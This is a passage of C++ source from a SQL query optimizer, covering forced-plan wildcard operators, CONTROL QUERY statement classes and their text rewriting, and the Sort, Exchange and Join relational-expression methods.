    ABORT("No support for classes derived from JoinForceWildcard");
  result = new(outHeap) JoinForceWildCard(getOperatorType(),
                                          NULL,
                                          NULL,
                                          plan_,
                                          numOfEsps_,
                                          outHeap);
  WildCardOp::copyTopNode(result,outHeap);
  return result;
}

// Display text: "forced [planN|typeN|indexjoin] <join kind>".
const NAString JoinForceWildCard::getText() const
{
  NAString result("forced", CmpCommon::statementHeap());

  if (plan_ == FORCED_PLAN0)
    result += " plan0";
  else if (plan_ == FORCED_PLAN1)
    result += " plan1";
  else if (plan_ == FORCED_PLAN2)
    result += " plan2";
  else if (plan_ == FORCED_TYPE1)
    result += " type1";
  else if (plan_ == FORCED_TYPE2)
    result += " type2";
  else if (plan_ == FORCED_INDEXJOIN)
    result += " indexjoin";

  switch (getOperatorType())
  {
  case REL_FORCE_NESTED_JOIN:
    result += " nested join";
    break;
  case REL_FORCE_MERGE_JOIN:
    result += " merge join";
    break;
  case REL_FORCE_HASH_JOIN:
    result += " hash join";
    break;
  case REL_FORCE_HYBRID_HASH_JOIN:
    result += " hybrid hash join";
    break;
  case REL_FORCE_ORDERED_HASH_JOIN:
    result += " ordered hash join";
    break;
  default:
    result += " join";
    break;
  }

  return result;
}

// -----------------------------------------------------------------------
// member functions for class ExchangeForceWildCard
// -----------------------------------------------------------------------

// Construct a forced-exchange wildcard: which exchange kind, how the
// logical partitions are handled, and the number of bottom ESPs.
ExchangeForceWildCard::ExchangeForceWildCard(RelExpr *child0,
                                             forcedExchEnum which,
                                             forcedLogPartEnum whatLogPart,
                                             Lng32 numBottomEsps,
                                             CollHeap *outHeap)
  : WildCardOp(REL_FORCE_EXCHANGE, 0, child0, NULL, outHeap),
    which_(which),
    whatLogPart_(whatLogPart),
    howMany_(numBottomEsps)
{
}

ExchangeForceWildCard::~ExchangeForceWildCard() {}

// Deep-copy this forced-exchange wildcard (child is NOT copied).
// Derived classes are not supported.
RelExpr * ExchangeForceWildCard::copyTopNode(RelExpr *derivedNode,
                                             CollHeap* outHeap)
{
  RelExpr *result;
  if (derivedNode != NULL)
    ABORT("No support for classes derived from ExchangeForceWildcard");
  result = new(outHeap) ExchangeForceWildCard(NULL,
                                              which_,
                                              whatLogPart_,
                                              howMany_,
                                              outHeap);
  WildCardOp::copyTopNode(result,outHeap);
  return result;
}

// Display text: "forced [PA|PAPA|ESP] exchange".
const NAString ExchangeForceWildCard::getText() const
{
  NAString result("forced",CmpCommon::statementHeap());
  if (which_ == FORCED_PA)
    result += " PA";
  else if (which_ == FORCED_PAPA)
    result += " PAPA";
  else if (which_ == FORCED_ESP_EXCHANGE)
    result += " ESP";
  result += " exchange";
  return result;
}

// -----------------------------------------------------------------------
// member functions for class UDFForceWildCard
// -----------------------------------------------------------------------

// Construct with empty function/action names (heap-anchored strings).
UDFForceWildCard::UDFForceWildCard(OperatorTypeEnum op, CollHeap *outHeap)
  : WildCardOp(op, 0, NULL, NULL, outHeap),
    functionName_(outHeap),
    actionName_(outHeap)
{}

// Construct for a specific UDF (and optional action) name.
UDFForceWildCard::UDFForceWildCard(const NAString& functionName,
                                   const NAString& actionName,
                                   CollHeap *outHeap)
  : WildCardOp(REL_FORCE_ANY_SCALAR_UDF, 0, NULL, NULL, outHeap),
    functionName_(functionName, outHeap),
    actionName_(actionName, outHeap)
{}

UDFForceWildCard::~UDFForceWildCard()
{
}

//----------------------------------------------------------
// merge with another UDFForceWildCard object.
// return FALSE if a conflict between the options of
// the two objects exists.
//----------------------------------------------------------
// Merge rule per name: adopt the other side's value if ours is empty,
// conflict (FALSE) if both are non-empty and differ.
//----------------------------------------------------------
NABoolean UDFForceWildCard::mergeUDFOptions(const UDFForceWildCard &other)
{
  if ((other.functionName_ != "")
      &&(other.functionName_ != functionName_))
  {
    if (functionName_ == "")
    {
      functionName_ = other.functionName_;
    }
    else
      return FALSE; // conflict
  }

  if ((other.actionName_ != "")
      &&(other.actionName_ != actionName_))
  {
    if (actionName_ == "")
    {
      actionName_ = other.actionName_;
    }
    else
      return FALSE; // conflict
  }

  return TRUE;
}

// Deep-copy this forced-UDF wildcard. Derived classes are not supported.
RelExpr * UDFForceWildCard::copyTopNode(RelExpr *derivedNode,
                                        CollHeap* outHeap)
{
  UDFForceWildCard *temp;
  if (derivedNode != NULL)
    ABORT("No support for classes derived from UDFForceWildCard");
  temp = new (outHeap) UDFForceWildCard(functionName_,actionName_,outHeap);
  RelExpr *result = temp;
  WildCardOp::copyTopNode(result,outHeap);
  return result;
}

// Display text: "forced UDF(<function>[, <action>])".
const NAString UDFForceWildCard::getText() const
{
  NAString result("forced UDF", CmpCommon::statementHeap());
  if (functionName_ != "")
  {
    result += "(";
    result += functionName_;
    if (actionName_ != "")
    {
      result += ", ";
      result += actionName_;
    }
    result += ")";
  }
  return result;
}

// -----------------------------------------------------------------------
// member functions for Control* base class
// -----------------------------------------------------------------------
ControlAbstractClass::~ControlAbstractClass() {}

// Two Control* nodes match if token, value, dynamic flag and reset flag
// all agree (the raw SQL text is irrelevant for matching).
NABoolean ControlAbstractClass::duplicateMatch(const RelExpr & other) const
{
  if (NOT RelExpr::duplicateMatch(other)) return FALSE;
  ControlAbstractClass &o = (ControlAbstractClass &) other;
  // We do NOT need to compare sqlText's here
  return (token_ == o.token_ AND value_ == o.value_ AND
          dynamic_ == o.dynamic_ AND reset_ == o.reset_);
}

// Unlike the other copyTopNode's, a concrete derived node is required
// here; only the reset_ flag is propagated.
RelExpr *ControlAbstractClass::copyTopNode(RelExpr *derivedNode, CollHeap *h)
{
  CMPASSERT(derivedNode);
  ((ControlAbstractClass *)derivedNode)->reset_ = reset_;
  return derivedNode;
}

// TRUE when the arkcmp environment should be altered immediately:
// only for static statements compiled in a static context.
NABoolean ControlAbstractClass::alterArkcmpEnvNow() const
{
  return NOT (dynamic() || CmpCommon::context()->GetMode() == STMT_DYNAMIC);
}

// Classify this control statement for static-only processing.
StaticOnly ControlAbstractClass::isAStaticOnlyStatement() const
{
  if (dynamic_) return NOT_STATIC_ONLY;
  return (getOperatorType() == REL_CONTROL_QUERY_DEFAULT) ?
    STATIC_ONLY_WITH_WORK_FOR_PREPROCESSOR : STATIC_ONLY_VANILLA;
}

// Strip a single leading whitespace character, if present.
static void removeLeadingSpace(NAString &sqlText)
{
  if (!sqlText.isNull() && isspace((unsigned char)sqlText[size_t(0)]))
    sqlText.remove(0, 1); // For VS2003
}

// TRUE if sqlText begins with keyword kwd followed by a non-identifier
// delimiter; when thenRemoveIt, the keyword (but not the delimiter) is
// stripped from sqlText.
static NABoolean beginsWithKeyword(NAString &sqlText, const char *kwd,
                                   NABoolean thenRemoveIt = TRUE)
{
  // Assumes Prettify has been called, so only one space (at most) btw tokens.
  // If this is called more than once, the second time in the text might begin
  // with a delimiting space.
  removeLeadingSpace(sqlText);

  size_t len = strlen(kwd) + 1; // +1 for delimiter (space)
  if (sqlText.length() > len)
  {
    NAString tmp(sqlText,CmpCommon::statementHeap());
    tmp.remove(len);
    char c = tmp[--len]; // delimiter
    if (!isalnum(c) && c != '_')
    {
      tmp.remove(len); // remove the delimiter 'c' from tmp
      if (tmp == kwd)
      {
        if (thenRemoveIt)
          sqlText.remove(0, len); // leave delimiter, now at beginning
        return TRUE;
      }
    }
  }
  return FALSE;
}

// Convert "PROCEDURE xyz () CONTROL..." to just the "CONTROL..." part.
// Convert a dynamic stmt's text of "SET SCHEMA 'x.y';"
// into the static "CONTROL QUERY DEFAULT SCHEMA 'x.y';"
// for its round-trip to executor and back here as a SQLTEXT_STATIC_COMPILE.
void ControlAbstractClass::rewriteControlText(
  NAString &sqlText, CharInfo::CharSet sqlTextCharSet,
  ControlAbstractClass *ctrl)
{
  PrettifySqlText(sqlText); // trim, upcase where okay, cvt tabs to spaces

  // strip a leading "PROCEDURE xyz ()" wrapper
  if (beginsWithKeyword(sqlText, "PROCEDURE"))
  {
    size_t rp = sqlText.index(')');
    CMPASSERT(rp != NA_NPOS);
    sqlText.remove(0, ++rp);
    removeLeadingSpace(sqlText);
  }

  // if SHOWSHAPE or SHOWPLAN, remove them from the beginning.
  // beginsWithKeyword will remove the keyword, if found.
  if ((beginsWithKeyword(sqlText, "SHOWSHAPE")) ||
      (beginsWithKeyword(sqlText, "SHOWPLAN")))
  {
    removeLeadingSpace(sqlText);
  }

  if (ctrl->dynamic())
  {
    // dynamic "SET ..." becomes "CONTROL ... SET ..."
    if ((beginsWithKeyword(sqlText, "SET")) &&
        (ctrl->getOperatorType() != REL_SET_SESSION_DEFAULT))
      sqlText.prepend(getControlTextPrefix(ctrl));
  }
  else
  {
    if (beginsWithKeyword(sqlText, "DECLARE"))
      sqlText.prepend(getControlTextPrefix(ctrl));
  }

  //## We'll have to fix SqlParser.y, I think, if this stmt appears in
  //## a compound stmt (IF ... THEN SET SCHEMA 'x' ... ELSE SET SCHEMA 'y' ...)
  if (ctrl->getOperatorType() != REL_SET_SESSION_DEFAULT)
  {
    if ((NOT beginsWithKeyword(sqlText, "CONTROL", FALSE)) &&
        (NOT beginsWithKeyword(sqlText, "CQD", FALSE)))
      CMPASSERT(0);
  }
}

// Map a Control* operator type to its SQL statement prefix.
NAString ControlAbstractClass::getControlTextPrefix(
  const ControlAbstractClass *ctrl)
{
  switch (ctrl->getOperatorType())
  {
  case REL_CONTROL_QUERY_SHAPE:
    return "CONTROL QUERY SHAPE";
  case REL_CONTROL_QUERY_DEFAULT:
    return "CONTROL QUERY DEFAULT";
  case REL_CONTROL_TABLE:
    return "CONTROL TABLE";
  case REL_CONTROL_SESSION:
    return "CONTROL SESSION";
  case REL_SET_SESSION_DEFAULT:
    return "SET SESSION DEFAULT";
  default:
    return "CONTROL ??";
  }
}

// -----------------------------------------------------------------------
// member functions for class ControlQueryShape
// -----------------------------------------------------------------------
RelExpr * ControlQueryShape::copyTopNode(RelExpr *derivedNode, CollHeap *h)
{
  ControlQueryShape *result;
  if (derivedNode == NULL)
    result = new (h) ControlQueryShape(NULL, getSqlText(),
                                       getSqlTextCharSet(),
                                       holdShape_,
                                       dynamic_,
                                       ignoreExchange_,
                                       ignoreSort_, h);
  else
    result = (ControlQueryShape *) derivedNode;
  return ControlAbstractClass::copyTopNode(result,h);
}

// Display text includes any "WITHOUT ..." enforcer suppression.
const NAString ControlQueryShape::getText() const
{
  NAString result(getControlTextPrefix(this));
  if (ignoreExchange_)
  {
    if (ignoreSort_)
      result += " WITHOUT ENFORCERS";
    else
      result += " WITHOUT EXCHANGE";
  }
  else if (ignoreSort_)
    result += " WITHOUT SORT";
  return result;
}

// -----------------------------------------------------------------------
// member functions for class ControlQueryDefault
// -----------------------------------------------------------------------
ControlQueryDefault::ControlQueryDefault(
  const NAString &sqlText, CharInfo::CharSet sqlTextCharSet,
  const NAString &token,
  const NAString &value,
  NABoolean dyn,
  Lng32 holdOrRestoreCQD,
  CollHeap *h,
  Int32 reset):
    ControlAbstractClass(REL_CONTROL_QUERY_DEFAULT, sqlText, sqlTextCharSet,
                         token, value, dyn, h, reset),
    holdOrRestoreCQD_(holdOrRestoreCQD),
    attrEnum_(__INVALID_DEFAULT_ATTRIBUTE)
{}

// Copies also the resolved default-attribute enum (attrEnum_).
RelExpr * ControlQueryDefault::copyTopNode(RelExpr *derivedNode, CollHeap *h)
{
  RelExpr *result;
  if (derivedNode == NULL)
  {
    result = new (h) ControlQueryDefault(sqlText_, sqlTextCharSet_, token_,
                                         value_, dynamic_,
                                         holdOrRestoreCQD_, h);
    ((ControlQueryDefault *)result)->attrEnum_ = attrEnum_;
  }
  else
    result = derivedNode;
  return ControlAbstractClass::copyTopNode(result,h);
}

const NAString ControlQueryDefault::getText() const
{
  return getControlTextPrefix(this);
}

// -----------------------------------------------------------------------
// member functions for class ControlTable
// -----------------------------------------------------------------------
ControlTable::ControlTable(
  CorrName *tableName,
  const NAString &sqlText, CharInfo::CharSet sqlTextCharSet,
  const NAString &token,
  const NAString &value,
  NABoolean dyn,
  CollHeap *h):
    ControlAbstractClass(REL_CONTROL_TABLE, sqlText, sqlTextCharSet,
                         token, value, dyn, h),
    tableName_(tableName)
{}

// NOTE(review): tableName_ is copied as a pointer (shallow) -- confirm
// the CorrName's lifetime covers the copy.
RelExpr * ControlTable::copyTopNode(RelExpr *derivedNode, CollHeap *h)
{
  RelExpr *result;
  if (derivedNode == NULL)
    result = new (h) ControlTable(tableName_, sqlText_, sqlTextCharSet_,
                                  token_, value_, dynamic_, h);
  else
    result = derivedNode;
  return ControlAbstractClass::copyTopNode(result,h);
}

const NAString ControlTable::getText() const
{
  return getControlTextPrefix(this);
}

// -----------------------------------------------------------------------
// member functions for class ControlSession
// -----------------------------------------------------------------------
ControlSession::ControlSession(
  const NAString &sqlText, CharInfo::CharSet sqlTextCharSet,
  const NAString &token,
  const NAString &value,
  NABoolean dyn,
  CollHeap *h):
    ControlAbstractClass(REL_CONTROL_SESSION, sqlText, sqlTextCharSet,
                         token, value, dyn, h)
{}

RelExpr * ControlSession::copyTopNode(RelExpr *derivedNode, CollHeap *h)
{
  RelExpr *result;
  if (derivedNode == NULL)
    result = new (h) ControlSession(sqlText_, sqlTextCharSet_,
                                    token_, value_, dynamic_, h);
  else
    result = derivedNode;
  return ControlAbstractClass::copyTopNode(result,h);
}

const NAString ControlSession::getText() const
{
  return getControlTextPrefix(this);
}

// -----------------------------------------------------------------------
// member functions for class SetSessionDefault
// -----------------------------------------------------------------------
SetSessionDefault::SetSessionDefault(
  const NAString &sqlText, CharInfo::CharSet sqlTextCharSet,
  const NAString &token,
  const NAString &value,
  CollHeap *h):
    ControlAbstractClass(REL_SET_SESSION_DEFAULT, sqlText, sqlTextCharSet,
                         token, value, TRUE, h)
{}

RelExpr * SetSessionDefault::copyTopNode(RelExpr *derivedNode, CollHeap *h)
{
  RelExpr *result;
  if (derivedNode == NULL)
    result = new (h) SetSessionDefault(sqlText_, sqlTextCharSet_,
                                       token_, value_, h);
  else
    result = derivedNode;
  return ControlAbstractClass::copyTopNode(result,h);
}

const NAString SetSessionDefault::getText() const
{
  return getControlTextPrefix(this);
}

// -----------------------------------------------------------------------
// member functions for class OSIMControl
// -----------------------------------------------------------------------
OSIMControl::OSIMControl(OptimizerSimulator::osimMode mode,
                         NAString & localDir,
                         NABoolean force,
                         CollHeap * oHeap)
  //the real work is done in OSIMControl::bindNode() to control OSIM.
  //We set operator type to REL_SET_SESSION_DEFAULT,
  //so as not to define dummy OSIMControl::codeGen() and OSIMControl::work(),
  //which will do nothing there,
  : ControlAbstractClass(REL_SET_SESSION_DEFAULT,
                         NAString("DUMMYSQLTEXT", oHeap),
                         CharInfo::ISO88591,
                         NAString("OSIM", oHeap),
                         NAString("DUMMYVALUE", oHeap),
                         TRUE, oHeap)
  , targetMode_(mode)
  , osimLocalDir_(localDir, oHeap)
  , forceLoad_(force)
{}

RelExpr * OSIMControl::copyTopNode(RelExpr *derivedNode, CollHeap *h )
{
  RelExpr *result;
  if (derivedNode == NULL)
    result = new (h) OSIMControl(targetMode_, osimLocalDir_, forceLoad_, h);
  else
    result = derivedNode;
  return ControlAbstractClass::copyTopNode(result,h);
}

// -----------------------------------------------------------------------
// member functions for class Sort
// -----------------------------------------------------------------------
Sort::~Sort()
{
}

Int32 Sort::getArity() const { return 1;}

// Hash includes the sort key and arranged columns so differently-keyed
// sorts never collide as duplicates.
HashValue Sort::topHash()
{
  HashValue result = RelExpr::topHash();
  result ^= sortKey_;
  result ^= arrangedCols_;
  return result;
}

NABoolean Sort::duplicateMatch(const RelExpr & other) const
{
  if (NOT RelExpr::duplicateMatch(other)) return FALSE;
  Sort &o = (Sort &) other;
  if (NOT (sortKey_ == o.sortKey_) OR
      NOT(arrangedCols_ == o.arrangedCols_))
    return FALSE;
  return TRUE;
}

RelExpr * Sort::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  Sort *result;
  if (derivedNode == NULL)
    result = new (outHeap) Sort(NULL, sortKey_, outHeap);
  else
    result = (Sort *) derivedNode;
  // copy arranged columns
  result->arrangedCols_ = arrangedCols_;
  return RelExpr::copyTopNode(result, outHeap);
}

NABoolean Sort::isLogical() const { return FALSE; }

NABoolean Sort::isPhysical() const { return TRUE; }

const NAString Sort::getText() const { return "sort"; }

// Priority: penalize serial sorts by a risk premium; prefer plans
// with more parallelism when a max-degree-of-parallelism goal applies.
PlanPriority Sort::computeOperatorPriority
(const Context* context,
 PlanWorkSpace *pws,
 Lng32 planNumber)
{
  const PhysicalProperty* spp = context->getPlan()->getPhysicalProperty();
  Lng32 degreeOfParallelism = spp->getCountOfPartitions();
  double val = 1;
  if (degreeOfParallelism <= 1)
  {
    // serial plans are risky. exact an insurance premium from serial plans.
    val = CURRSTMT_OPTDEFAULTS->riskPremiumSerial();
  }
  CostScalar premium(val);
  PlanPriority result(0, 0, premium);

  if (QueryAnalysis::Instance() AND
      QueryAnalysis::Instance()->optimizeForFirstNRows())
    result.incrementLevels(SORT_FIRST_N_PRIORITY,0);

  // For the option of Max Degree of Parallelism we can either use the
  // value set in comp_int_9 (if positive) or we use the number of CPUs
  // if the CQD is set to -1, or feature is disabled if CQD is 0 (default).
  Lng32 maxDegree = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9);
  if (CURRSTMT_OPTDEFAULTS->maxParallelismIsFeasible() OR ( maxDegree == -1) )
  {
    // if CQD is set to -1 this mean use the number of CPUs
    maxDegree = spp->getCurrentCountOfCPUs();
  }
  if (maxDegree > 1) // CQD set to 0 means feature is OFF
  {
    if (degreeOfParallelism < maxDegree)
      result.incrementLevels(0,-10); // need to replace with constant
  }

  return result;
}

void Sort::addLocalExpr(LIST(ExprNode *) &xlist,
                        LIST(NAString) &llist) const
{
  if (sortKey_.entries() > 0)
  {
    xlist.insert(sortKey_.rebuildExprTree(ITM_ITEM_LIST));
    llist.insert("sort_key");
  }

  if (PartialSortKeyFromChild_.entries() > 0)
  {
    xlist.insert(PartialSortKeyFromChild_.rebuildExprTree(ITM_ITEM_LIST));
    llist.insert("PartialSort_FromChild");
  }

  // if (NOT arrangedCols_.isEmpty())
  // {
  //   xlist.insert(arrangedCols_.rebuildExprTree(ITM_ITEM_LIST));
  //   llist.insert("arranged_cols");
  // }

  RelExpr::addLocalExpr(xlist,llist);
}

void Sort::needSortedNRows(NABoolean val)
{
  sortNRows_ = val;
  // Sort changes a GET_N to GET_ALL, so it does not propagate a
  // Get_N request. It can simply act on one.
}

// -----------------------------------------------------------------------
// member functions for class SortFromTop
// -----------------------------------------------------------------------
RelExpr * SortFromTop::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  SortFromTop *result;
  if (derivedNode == NULL)
    result = new (outHeap) SortFromTop(NULL, outHeap);
  else
    result = (SortFromTop *) derivedNode;
  result->getSortRecExpr() = getSortRecExpr();
  return Sort::copyTopNode(result, outHeap);
}

const NAString SortFromTop::getText() const { return "sort_from_top"; }

// -----------------------------------------------------------------------
// member functions for class Exchange
// -----------------------------------------------------------------------
Exchange::~Exchange()
{
}

Int32 Exchange::getArity() const { return 1;}

RelExpr * Exchange::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  Exchange *result;
  if (derivedNode == NULL)
  {
    result = new (outHeap) Exchange(NULL, outHeap);
  }
  else
    result = (Exchange *) derivedNode;
  result->upMessageBufferLength_=upMessageBufferLength_;
  result->downMessageBufferLength_=downMessageBufferLength_;
  result->hash2RepartitioningWithSameKey_ = hash2RepartitioningWithSameKey_;
  if (halloweenSortIsMyChild_)
    result->markHalloweenSortIsMyChild();
  return RelExpr::copyTopNode(result, outHeap);
}

NABoolean Exchange::isLogical() const { return FALSE; }

NABoolean Exchange::isPhysical() const { return TRUE; }

// APA: a DP2 exchange whose bottom partitioning function does not use
// a PAPA (parallel-access) node.
NABoolean Exchange::isAPA() const
{
  if (NOT isDP2Exchange() OR bottomPartFunc_ == NULL)
    return FALSE;
  const LogPhysPartitioningFunction *lpf = bottomPartFunc_->
    castToLogPhysPartitioningFunction();
  return (lpf == NULL OR NOT lpf->getUsePapa());
}

// APAPA (split-top): a DP2 exchange with a bottom part. func that is
// not an APA.
NABoolean Exchange::isAPAPA() const
{
  return (isDP2Exchange() AND bottomPartFunc_ AND NOT isAPA());
}

// Display text: exchange kind, top:bottom partition counts, PA count
// and logical partitioning scheme where applicable.
const NAString Exchange::getText() const
{
  NAString result("exchange",CmpCommon::statementHeap());

  if (isAPA())
    result = "pa_exchange";
  else if (isAPAPA())
    result = "split_top";
  else if (isAnESPAccess())
    result = "esp_access";
  else if (isEspExchange())
    result = "esp_exchange";

  const PartitioningFunction *topPartFunc = getTopPartitioningFunction();
  const PartitioningFunction *bottomPartFunc = getBottomPartitioningFunction();
  Lng32 topNumParts = ANY_NUMBER_OF_PARTITIONS;
  Lng32 bottomNumParts = ANY_NUMBER_OF_PARTITIONS;
  if (topPartFunc)
    topNumParts = topPartFunc->getCountOfPartitions();
  if (bottomPartFunc)
    bottomNumParts = bottomPartFunc->getCountOfPartitions();
  if (topNumParts != ANY_NUMBER_OF_PARTITIONS OR
      bottomNumParts != ANY_NUMBER_OF_PARTITIONS)
  {
    char str[TEXT_DISPLAY_LENGTH];
    sprintf(str," %d:%d",topNumParts,bottomNumParts);
    result += str;
  }

  if (bottomPartFunc AND isDP2Exchange())
  {
    const LogPhysPartitioningFunction *lpf =
      bottomPartFunc->castToLogPhysPartitioningFunction();
    if (lpf)
    {
      if (lpf->getUsePapa())
      {
        char str[TEXT_DISPLAY_LENGTH];
        sprintf(str," with %d PA(s)",lpf->getNumOfClients());
        result += str;
      }
      switch (lpf->getLogPartType())
      {
      case LogPhysPartitioningFunction::LOGICAL_SUBPARTITIONING:
        result += ", log. subpart.";
        break;
      case LogPhysPartitioningFunction::HORIZONTAL_PARTITION_SLICING:
        result += ", slicing";
        break;
      case LogPhysPartitioningFunction::PA_GROUPED_REPARTITIONING:
        result += ", repartitioned";
        break;
      default:
        break;
      }
    }
  }
  return result;
}

// Priority: COMP_INT_9 == -2 boosts an exchange directly under the
// root (or FIRST_N) by 10 levels.
PlanPriority Exchange::computeOperatorPriority
(const Context* context,
 PlanWorkSpace *pws,
 Lng32 planNumber)
{
  PlanPriority result;

  OperatorTypeEnum parOperType = context->getCurrentAncestor()->getPlan()->
    getPhysicalExpr()->getOperatorType();
  Lng32 cqdValue = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9);
  if ((cqdValue == -2) AND
      ((parOperType == REL_ROOT) OR
       (parOperType == REL_FIRST_N)))
    result.incrementLevels(10,0);

  return result;
}

void Exchange::addLocalExpr(LIST(ExprNode *) &xlist,
                            LIST(NAString) &llist) const
{
  const PartitioningFunction *topPartFunc = getTopPartitioningFunction();
  if (topPartFunc AND
      topPartFunc->getCountOfPartitions() > 1 AND
      topPartFunc->getPartitioningExpression())
  {
    xlist.insert(topPartFunc->getPartitioningExpression());
    llist.insert("partitioning_expression");
  }

  if (NOT sortKeyForMyOutput_.isEmpty())
  {
    xlist.insert(sortKeyForMyOutput_.rebuildExprTree(ITM_ITEM_LIST));
    llist.insert("merged_order");
  }

  RelExpr::addLocalExpr(xlist,llist);
}

// -----------------------------------------------------------------------
// member functions for class Join
// -----------------------------------------------------------------------
Int32 Join::getArity() const { return 2;}

// helper function used in
// HashJoinRule::topMatch() and
// JoinToTSJRule::topMatch()
// to make sure that only one of them is turned off.
// Otherwise, error 2235 "pass one skipped, but cannot produce a plan
// in pass two, originated from file ../optimizer/opt.cpp"
NABoolean Join::allowHashJoin()
{
  // HJ is only implementation for full outer join
  NABoolean fullOuterJoin =
    (CmpCommon::getDefault(COMP_BOOL_196) != DF_ON) AND isFullOuterJoin();
  if (fullOuterJoin) return TRUE;

  // HJ is only join implementation allowed when avoiding halloween update
  if (avoidHalloweenR2()) return TRUE;

  // favor NJ when only one row from outer for sure
  Cardinality minrows, outerLimit;
  GroupAttributes *oGrpAttr = child(0).getGroupAttr();
  NABoolean hasConstraint = oGrpAttr->hasCardConstraint(minrows, outerLimit);
  // outerLimit was set to INFINITE_CARDINALITY if no constraint
  CostScalar outerRows(outerLimit);
  // if it has no constraint and outer is 1 table
  if (!hasConstraint && oGrpAttr->getNumBaseTables() == 1)
  {
    // use max cardinality estimate
    outerRows = oGrpAttr->getResultMaxCardinalityForEmptyInput();
  }
  NABoolean favorNJ =
    CURRSTMT_OPTDEFAULTS->isNestedJoinConsidered() AND
    (outerRows <= 1) AND
    GlobalRuleSet->getCurrentPassNumber() >
      GlobalRuleSet->getFirstPassNumber();
  if (favorNJ) return FALSE; // disallow HJ
  return TRUE; // allow HJ
}

// Map this (logical) join's operator type to the corresponding TSJ type.
OperatorTypeEnum Join::getTSJJoinOpType()
{
  switch (getOperatorType())
  {
  case REL_JOIN:
  case REL_ROUTINE_JOIN:
    return REL_TSJ;
  case REL_LEFT_JOIN:
    return REL_LEFT_TSJ;
  case REL_SEMIJOIN:
    return REL_SEMITSJ;
  case REL_ANTI_SEMIJOIN:
    return REL_ANTI_SEMITSJ;
  default:
    ABORT("Unsupported join type in Join::getTSJJoinOpType()");
    return REL_NESTED_JOIN; // Return makes MSVC happy.
  } // switch
} // Join::getTSJJoinOpType()

// Map this join's operator type to the corresponding nested-join type.
OperatorTypeEnum Join::getNestedJoinOpType()
{
  switch (getOperatorType())
  {
  case REL_JOIN:
  case REL_ROUTINE_JOIN:
  case REL_TSJ:
    return REL_NESTED_JOIN;
  case REL_LEFT_JOIN:
  case REL_LEFT_TSJ:
    return REL_LEFT_NESTED_JOIN;
  case REL_SEMIJOIN:
  case REL_SEMITSJ:
    return REL_NESTED_SEMIJOIN;
  case REL_ANTI_SEMIJOIN:
  case REL_ANTI_SEMITSJ:
    return REL_NESTED_ANTI_SEMIJOIN;
  default:
    ABORT("Unsupported join type in Join::getNestedJoinOpType()");
    return REL_NESTED_JOIN; // Return makes MSVC happy.
  } // switch
} // Join::getNestedJoinOpType()

// Map this join's operator type to a hash-join type: ordered hash join
// when no overflow is allowed, hybrid hash join otherwise.
OperatorTypeEnum Join::getHashJoinOpType(NABoolean isNoOverflow)
{
  if(isNoOverflow)
  {
    switch (getOperatorType())
    {
    case REL_JOIN:
      return REL_ORDERED_HASH_JOIN;
    case REL_LEFT_JOIN:
      return REL_LEFT_ORDERED_HASH_JOIN;
    case REL_SEMIJOIN:
      return REL_ORDERED_HASH_SEMIJOIN;
    case REL_ANTI_SEMIJOIN:
      return REL_ORDERED_HASH_ANTI_SEMIJOIN;
    default:
      ABORT("Unsupported join type in Join::getHashJoinOpType()");
      return REL_ORDERED_HASH_JOIN; // return makes MSVC happy.
    } // switch
  }
  else
  {
    switch (getOperatorType())
    {
    case REL_JOIN:
      return REL_HYBRID_HASH_JOIN;
    case REL_LEFT_JOIN:
      return REL_LEFT_HYBRID_HASH_JOIN;
    case REL_FULL_JOIN:
      return REL_FULL_HYBRID_HASH_JOIN;
    case REL_SEMIJOIN:
      return REL_HYBRID_HASH_SEMIJOIN;
    case REL_ANTI_SEMIJOIN:
      return REL_HYBRID_HASH_ANTI_SEMIJOIN;
    default:
      ABORT("Unsupported join type in Join::getHashJoinOpType()");
      return REL_HYBRID_HASH_JOIN; // return makes MSVC happy.
    } // switch
  }//else
} // Join::getHashJoinOpType()

// A cross product is an inner non-semi join with no remaining true
// join (VEG equality) predicates after coverage analysis.
NABoolean Join::isCrossProduct() const
{
  // only for our beloved inner non semi joins (for now)
  if (NOT isInnerNonSemiJoin()) return FALSE;

  ValueIdSet VEGEqPreds;
  ValueIdSet newJoinPreds = getSelectionPred();
  newJoinPreds += getJoinPred();

  // -----------------------------------------------------------------
  // Find all the VEGPreds in the newJoinPreds.
  // Remove all the ones that are not true join predicates
  // (i.e. they are covered by the inputs, or one of the
  // children cannot produce it)
  // -----------------------------------------------------------------
  newJoinPreds.lookForVEGPredicates(VEGEqPreds);
  // remove those VEGPredicates that are covered by the input values
  VEGEqPreds.removeCoveredExprs(getGroupAttr()->
                                getCharacteristicInputs());
  VEGEqPreds.removeUnCoveredExprs(child(0).getGroupAttr()->
                                  getCharacteristicOutputs());
  VEGEqPreds.removeUnCoveredExprs(child(1).getGroupAttr()->
                                  getCharacteristicOutputs());

  if (VEGEqPreds.isEmpty())
    return TRUE; // is a cross product
  else
    return FALSE;
}

NABoolean Join::isOuterJoin() const
{
  if(isLeftJoin() || isRightJoin() || isFullOuterJoin())
    return TRUE;
  return FALSE;
}

// TRUE for every operator type that is some flavor of join
// (including the forced-plan wildcards, INTERSECT and EXCEPT).
NABoolean RelExpr::isAnyJoin() const
{
  switch (getOperatorType())
  {
  case REL_JOIN:
  case REL_ROUTINE_JOIN:
  case REL_LEFT_JOIN:
  case REL_ANY_JOIN:
  case REL_ANY_TSJ:
  case REL_ANY_INNER_JOIN:
  case REL_ANY_NON_TS_INNER_JOIN:
  case REL_ANY_NON_TSJ_JOIN:
  case REL_ANY_LEFT_JOIN:
  case REL_ANY_LEFT_TSJ:
  case REL_ANY_NESTED_JOIN:
  case REL_ANY_HASH_JOIN:
  case REL_ANY_MERGE_JOIN:
  case REL_FORCE_JOIN:
  case REL_FORCE_NESTED_JOIN:
  case REL_FORCE_HASH_JOIN:
  case REL_FORCE_ORDERED_HASH_JOIN:
  case REL_FORCE_HYBRID_HASH_JOIN:
  case REL_FORCE_MERGE_JOIN:
  case REL_INTERSECT:
  case REL_EXCEPT:
    return TRUE;
  default:
    return FALSE;
  }
}

NABoolean Join::isInnerNonSemiJoinWithNoPredicates() const
{
  if (isInnerNonSemiJoin() AND
      getSelectionPred().isEmpty() AND
      getJoinPred().isEmpty())
    return TRUE;
  else
    return FALSE;
}

// --- join-kind predicates, all driven by the operator type ---

NABoolean Join:: isInnerJoin() const
{ return getOperator().match(REL_ANY_INNER_JOIN); }

